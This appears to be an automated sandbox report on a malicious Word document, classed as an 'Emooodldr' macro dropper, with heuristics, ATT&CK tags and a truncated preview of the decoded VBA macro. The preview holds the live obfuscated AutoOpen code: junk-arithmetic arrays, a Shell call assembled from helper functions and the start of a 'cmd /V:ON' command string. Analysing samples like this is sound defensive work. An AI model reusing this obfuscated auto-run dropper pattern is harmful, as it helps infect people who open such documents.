MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Emooodldr-6683740-0', indicating it's a dropper for the Emooodldr family. The presence of a legacy WordBasic AutoOpen macro (OLE_LEGACY_WORDBASIC_AUTOEXEC, OLE_VBA_AUTOOPEN) strongly suggests the macro is designed to execute automatically upon opening the document. This macro likely downloads and executes a second-stage payload, a common characteristic of droppers.
Heuristics 5
-
ClamAV: Doc.Dropper.Emooodldr-6683740-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Emooodldr-6683740-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7908 bytes |
SHA-256: 52c23b6ce14b9ae9c1abee11e57d6fae9bb1d19e38eff3fd2c76d83809240236 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "wUfpDMVhqG" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On _ Error _ Resume _ Next Dim wRumSE() ReDim wRumSE(4) wRumSE(0) = (16541 / zXhIk) wRumSE(1) = 8417 * IQEJj / LIswc * YjfdA * (12560 / KzOJz * AqXCQX * 38615) wRumSE(2) = XjQwm * 89192 * 43322 * 71309 * Bppnj / RujCTt wRumSE(3) = 42747 / GGffXn * 11182 / ZIMAAP * (58885 / MuZpM / HqQDF * kVALB) * 73627 * rGOwz / ZQhbj / CPRpZU Dim mzpPUh() ReDim mzpPUh(3) mzpPUh(0) = 95288 / EHAzNF / 75222 / zvbmm * (ZPhQD / SfarVE) mzpPUh(1) = (44963 * RwiPGi / 23651 * 49543 * jYzcJs / suvjaZ / 66359 * iEZYh) mzpPUh(2) = iJivr * RMjErz / zrGQIn / 92397 / (bJoRrQ * lBJns) Dim PPhSt() ReDim PPhSt(5) PPhSt(0) = (25067 / Nqsall) / (YoQll * CAtdz * 66683 * aivDHV * 83966 * rjqtjS / 25467 * wrFfM) PPhSt(1) = MsBGI * 5194 / 29647 / DSKVF / 67197 * oSPtlj / 10902 / rCqph PPhSt(2) = 95707 * uDiNSC * 3385 / NoMWf * 46133 * NNiXHY / 80734 / bjGTJE * 33944 / 24911 / XRYHqs * tmRCE PPhSt(3) = (KaBIo / LKqNER * jLjrw * ciwNzc / (UNdUH * hCVjRB / 29570 / BXhETp / LEKvVG * uMMCjR * zjVFQ / AKiRqh)) PPhSt(4) = (aGRJf / jJITZl / 63623 / 8774 * (16667 / TPVzi / 7375 / LwDEnA)) Dim uRwGOl() ReDim uRwGOl(3) uRwGOl(0) = (23255 / JAKcFD * (82663 * dbsBi)) uRwGOl(1) = (62728 / haTiV * khMjs * 7681 / (hjlQl / 47806)) uRwGOl(2) = (qzwmt / kFhwkO * (wPjuG * fZSzsM)) Dim cwqcQJ() ReDim cwqcQJ(3) cwqcQJ(0) = 52757 / iihkWj * zPzdpQ / ArJut * 61279 / BEZuW / IrUUE / 74230 cwqcQJ(1) = 42026 * CMVTwu / hsiJL / 20044 / zSVPvE * 63780 / HqAYW * vfZDu / wioavl * TLqlK / (95489 / rBwor * zcEfT / XKmNJ) cwqcQJ(2) = (11360 * ZzViu * 38915 / ANNRF / 80885 / 52436 * QujkM * lVZIHW) Dim dWmuJ() ReDim dWmuJ(4) dWmuJ(0) = (87139 / zHlqj) dWmuJ(1) = LAITk / tNXzZX * RcmIro * SuZNU / 62292 / 81180 * WXmwMl / 98566 * jmBpcn * ZMWKb * 84642 * wuBXp dWmuJ(2) = 32510 * uzEvKq / 99234 * bKNSr * 4356 / pwjin dWmuJ(3) = 99469 / zVOrJ / (47702 * wpviJp) Dim nwCnu() ReDim nwCnu(2) nwCnu(0) = (6634 * tiAoN) nwCnu(1) = (TjjrBL * VjdWP / (KciwI * 66954 / (UwiCVO / sbOiO * 57174 / iTXvz / (28743 / 80740 * EVfXos * KmsGmb)))) Shell@ rwahXZ + zjftYOWXDUjR + naczNushZ, Format(0) Dim AErbw() ReDim AErbw(4) AErbw(0) = (vPbduO * dfIpbk * 98047 * 38894 * (wIvJm / shXkZN * kinfaK / HXATz / (mrYflp * bGjjoC * 1226 / tGJob))) AErbw(1) = 74593 / iBvKoQ * 32719 * HbJMHA / rzkRO / vHqXJj * 26482 * qiYnr / WkaAf / fcEfq / WkOKEK / RjuEm AErbw(2) = (kDKQwl / PnnHY / 68348 / DwSCLh * 31393 * dCjaN / 29422 / ibfoVu) AErbw(3) = VLItR / jzGmVY * 39195 * QstFP / (50891 * HkWYJ * ILckOq / dHuSPn * (51088 * vuFpuH)) Dim nbwWmz() ReDim nbwWmz(5) nbwWmz(0) = (FjPkaw / wtWcP / MzGlii * AzpQH) nbwWmz(1) = 72408 * kmaBQ * (kLFzD / jvQAV / KOboV * nHYvG) nbwWmz(2) = zdoqSJ * 37301 * 41950 / suBtH * (66341 / wdjzTM / XivRPN * wpENz) nbwWmz(3) = (49193 * qcGhz * 84717 / TZvNc * (10642 * vLGXm * 62281 / LWsDI)) nbwWmz(4) = uFwfI / WIAcS * UfDEA * nHzCd / 96245 / MtuiGO * 56488 * oWOdPF / jBuio / SANGV End Sub Attribute VB_Name = "liGUhNalVHna" Function rwahXZ() On _ Error _ Resume _ Next Dim LmzQzi() ReDim LmzQzi(5) LmzQzi(0) = 64010 / NDdvQq * 67552 / jYBdNH LmzQzi(1) = pEwla * iuilX / 18683 / lwbEcm / (ZCHXbX / 95921 / JoKXE * JLAsHO) LmzQzi(2) = (JwJshn * 26837 / zwBbNk / zZKCOV) * (70246 / bzFTbk) LmzQzi(3) = 50990 / VYLQE / fukjYM * IwrsWO * 52536 * EAMYIi / cTmAWl / DBTjAu / 31041 * izYzS / NaFWz / QXzrvO / (SRzXpG / 54603 / 86490 * ZnNhSn) LmzQzi(4) = OAJPo / 27502 * 86367 / iXHQfB * 52996 * lHwAja * sqKXBR * SLcCl / mwzDYQ * RwMNoz Dim zfziGq() ReDim zfziGq(2) zfziGq(0) = 8104 * tAVvI / (kGQYw * IdXMiY / 63366 * fZbMaZ / 40773 / hhOjh * zVZMRj * zjnbOn) zfziGq(1) = 41896 / kDhJU / 54346 * ZJVik * 24314 / 47103 * (JNHdfC * SHzpip) dZnYZhq = Format(Chr(6 + 4 + 13 + 15 + 61)) + "md /V:ON/" + Fo ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.